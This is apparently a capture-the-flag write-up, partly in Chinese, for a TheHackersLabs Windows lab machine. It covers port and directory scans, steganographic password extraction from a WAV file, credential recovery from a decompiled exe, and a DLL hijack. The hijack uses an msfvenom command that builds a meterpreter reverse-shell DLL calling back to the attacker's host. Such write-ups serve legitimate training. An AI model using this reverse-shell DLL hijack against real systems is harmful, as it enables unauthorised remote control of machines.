Thehackerslabs-Welcome To The Jungle

Nmap
#

[root@Hacking] /home/kali/Jungle  
❯ nmap 192.168.55.161 -A -p-                                                                     

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Welcome to the Jungle - The Hex Guns
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

Dirsearch
#

[root@Hacking] /home/kali/Jungle  
❯ feroxbuster -u http://192.168.55.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.161
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      160c http://192.168.55.161/img => http://192.168.55.161/img/
200      GET       29l      124w     1209c http://192.168.55.161/index.php
200      GET       42l      168w     1915c http://192.168.55.161/albums.php
301      GET        2l       10w      162c http://192.168.55.161/media => http://192.168.55.161/media/
200      GET      126l      218w     2089c http://192.168.55.161/css/styles.css
200      GET        7l       13w      189c http://192.168.55.161/header.php
200      GET     8487l    45658w  3909539c http://192.168.55.161/img/axl.png
200      GET       29l      124w     1209c http://192.168.55.161/
200      GET        3l       11w       81c http://192.168.55.161/footer.php
403      GET       29l       91w     1232c http://192.168.55.161/css/
301      GET        2l       10w      160c http://192.168.55.161/css => http://192.168.55.161/css/
200      GET       29l      124w     1209c http://192.168.55.161/Index.php
301      GET        2l       10w      162c http://192.168.55.161/Media => http://192.168.55.161/Media/
200      GET     7731l    46736w  3824296c http://192.168.55.161/img/digital-destruction.png
200      GET     9162l    55315w  4712528c http://192.168.55.161/img/paradise-404.png
200      GET     8321l    48830w  4266377c http://192.168.55.161/img/neon-rebellion.png
301      GET        2l       10w      160c http://192.168.55.161/IMG => http://192.168.55.161/IMG/
200      GET        7l       13w      189c http://192.168.55.161/Header.php
200      GET       29l      124w     1209c http://192.168.55.161/INDEX.php
301      GET        2l       10w      160c http://192.168.55.161/CSS => http://192.168.55.161/CSS/
301      GET        2l       10w      160c http://192.168.55.161/Img => http://192.168.55.161/Img/
200      GET        3l       11w       81c http://192.168.55.161/Footer.php
301      GET        2l       10w      162c http://192.168.55.161/MEDIA => http://192.168.55.161/MEDIA/
200      GET        7l       13w      189c http://192.168.55.161/HEADER.php
200      GET        3l       11w       81c http://192.168.55.161/FOOTER.php
[####################] - 5m   1984940/1984940 0s      found:25      errors:0      
[####################] - 5m    220546/220546  722/s   http://192.168.55.161/ 
[####################] - 5m    220546/220546  721/s   http://192.168.55.161/img/ 
[####################] - 5m    220546/220546  720/s   http://192.168.55.161/media/ 
[####################] - 5m    220546/220546  721/s   http://192.168.55.161/css/ 
[####################] - 5m    220546/220546  722/s   http://192.168.55.161/Media/ 
[####################] - 5m    220546/220546  723/s   http://192.168.55.161/IMG/ 
[####################] - 5m    220546/220546  728/s   http://192.168.55.161/CSS/ 
[####################] - 5m    220546/220546  729/s   http://192.168.55.161/Img/ 
[####################] - 5m    220546/220546  797/s   http://192.168.55.161/MEDIA/

针对/media目录进行扫描，发现一个压缩包

[root@Hacking] /home/kali/Jungle  
❯ feroxbuster -u http://192.168.55.161/media -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.161/media
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [zip]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      162c http://192.168.55.161/media => http://192.168.55.161/media/
200      GET       11l       74w     5642c http://192.168.55.161/media/songs.zip
200      GET       11l       74w     5642c http://192.168.55.161/media/Songs.zip
[####################] - 35s   220547/220547  0s      found:3       errors:0      
[####################] - 34s   220546/220546  6468/s  http://192.168.55.161/media/

Stegseek
#

进行解压

[root@Hacking] /home/kali/Jungle  
❯ unzip songs.zip               
Archive:  songs.zip
  inflating: digital_destruction.txt  
  inflating: neon_rebellion.txt      
  inflating: paradaise_404.txt       
  inflating: solo_final.wav          

[root@Hacking] /home/kali/Jungle  
❯ ls
digital_destruction.txt  neon_rebellion.txt  paradaise_404.txt  solo_final.wav  songs.zip

[root@Hacking] /home/kali/Jungle  
❯ cat digital_destruction.txt                        
Binary burns through the wires,
1s and 0s flying higher...
# nothing special here

[root@Hacking] /home/kali/Jungle  
❯ cat neon_rebellion.txt                      
Rise against the static tide,
firewalls can't stop our ride.

[root@Hacking] /home/kali/Jungle  
❯ cat paradaise_404.txt                                          
They tried to hide, but we still found,
The jungle echoes with a sound...

There's always one password we’ve used since the first rehearsal...

这里把网页源码给ChatGPT生成密码组合，发现密码就是thehexguns

[root@Hacking] /home/kali/Jungle  
❯ stegseek solo_final.wav pass.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "thehexguns"
[i] Original filename: "password.txt".
[i] Extracting to "solo_final.wav.out".

[root@Hacking] /home/kali/Jungle  
❯ cat solo_final.wav.out
Password:sweetjungle2025
URL:theh3xgun5

IDA
#

得到一个密码字符串和URL，但是用户名并不是admin

在网页源码中发现了用户名是slash

登录到URL，可以下载一个exe文件

拖进IDA进行反编译

发现用户凭证，可以远程登录

DLL Hijack
#

进入到HexGuns目录，发现缺失了config.dll

setlist_uploader.exe反编译的结果也是说明需要config.dll

因此自己生成一个恶意的dll来反弹

[root@Hacking] /home/kali/Jungle  
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.55.4 LPORT=4444 -f dll -o config.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: config.dll

上传到目录里

然后等待被执行（或者手动重启一下机器），即可获得meterpreter

Reply by Email

Nmap #

Dirsearch #

Stegseek #

IDA #

DLL Hijack #

Nmap
#

Dirsearch
#

Stegseek
#

IDA
#

DLL Hijack
#